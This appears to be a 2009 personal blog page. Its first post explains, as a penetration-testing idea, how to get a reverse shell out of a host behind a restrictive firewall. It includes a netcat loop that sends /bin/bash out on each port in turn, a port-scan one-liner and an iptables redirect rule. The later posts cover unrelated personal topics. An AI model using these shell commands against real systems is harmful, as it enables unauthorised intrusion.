Thursday, September 24, 2009

Blind Connect-back Through Restrictive Firewall

The following scenario is admittedly far-fetched. It’s unlikely that you’ll actually encounter it but you might encounter a situation that’s similar. You’re in a pen test and you’ve found a host that you can execute commands on but you can’t see the results. It should be simple enough to shovel a shell back to you but that’s not working. You know you’ve got commands running because you can send a ping command and see the pings coming to you. There might be a restrictive firewall between you and the target that isn’t letting the TCP/UDP streams through for ports you choose. If this sounds silly consider that there are systems out there that actually use RPC over email.

You can craft a port scan through simple commands that you can launch into your target. However if you can’t see the results of the scan you don’t know what port you can connect through. A minimalist port scan might look like this:

(for i in seq 1 65536;do nc -zw 3 $i && echo $i open;done) > scan_results

In this case we can’t see the results. You can watch a packet capture on your box and then subsequently send another command to connect to the port that got through. I’m lazy, impatient and efficiency minded. Let’s combine our scan with the shoveling.

i=1;while [ $i -lt 65535 ]; do nc -e /bin/bash $i && exit;i=$(( i + 1 ));done

So this will skip the port scan and just look for a way out. But what are you supposed to do, leave a netcat listening on every port? If you have an extra IP ( we can send every port to our netcat port. It looks something like this:

iptables -I INPUT -p tcp -m state --state NEW -d -j DNAT --to

If your netcat listener is on any TCP connection to any port on will get forwarded to your netcat listener. Blind injection could also be used to send packets to an idle host while you watch the IP IDs returned by the idle host. Essentially you can cause a remote host to start an idle scan for you to watch from your host, abstracting away your real IP.

This is all theoretical and it’s probably something you’ll never find a situation where this is the answer. I’ve played with pieces but haven’t put it all together. I’m just the idea guy.

Update: That was fast.

Life with Schizophrenia

Life with Schizophrenia

My girlfriend has schizoaffective disorder, a disorder closely tied to schizophrenia. I found this comic which explains many of the life experiences a schizophrenia sufferer has. I thought it was worth sharing. Most people have really inaccurate perceptions of schizophrenia and this clears many of them up.

Monday, September 14, 2009

Amarok: Unsafe at any speed

crunge: I can't help but wonder why Amarok is such an unstable piece of shit
mrecho: ya, dont like the new version
crunge: THe things it does it does well. What it doesn't do is... run
crunge: It's not the new version. It has always crashed just updating your library. And instead of fixing basic shit like that they're adding features
crunge: Amarok 2: Unsafe at any speed
mrecho: ive never had issues with amarok crunge ....
kaboofa: mpc :D
mrecho: even with 30+ gigs of music on it
crunge: Yeah. I have about that and it's never worked well. Not on Gentoo, not on kubuntu 32, nor kubuntu 64
mrecho: whats the main issue your having?
crunge: So I'll be browsing some websites right. Text websites, nothing with flash or sound. Amarok will be stopped, sitting in my tray. All of a sudden I get a notification saying Amarok has crashed
mrecho: wtf...
crunge: no reason I can get outside it rescanning my collection *which hasn't changed*
crunge: at it does this at random
crunge: I'm trying to add music to my girlfriend's ipod, which it seems capable of doing but when I *delete* songs it crashes.
crunge: When I launch it again if figures out that the songs are gone and I can try adding music again
crunge: and this isn't a bug it's just a retarded absence of a feature. You can add songs to a music device by finding a track and right click blah blah blah. Unless it's in your playlist. Can't do it from your playlist. So if you've got a playlist of the stuff you want, too bad
crunge: you have to find the actual playlist file and add that to your device. But it won't tell you where it actually saves the playlist. There is no Save As. Only Save.
crunge: which, it's probably in the fucking database. THere's an "export" option. So you *can* export it out of Amarok so Amarok can read it in and put it on your music player
crunge: Hey! I got those songs to load. And 80% of the titles are SHA1 hashes

Friday, September 11, 2009

Unified Threat Management

Saying that an appliance provides Unified Threat Management is like saying a kevlar vest provides Complete Bodily Protection.

Bike Ride

6.2 mile ride to work with a friend. A couple of small uphills and a few large downhills. Not looking forward to the trip home.

The trip home was better than the trip there. Got into a great groove going up the hills. Helped having a fellow rider to talk with. Got home feeling really good.

12 miles total (return trip was more right turns)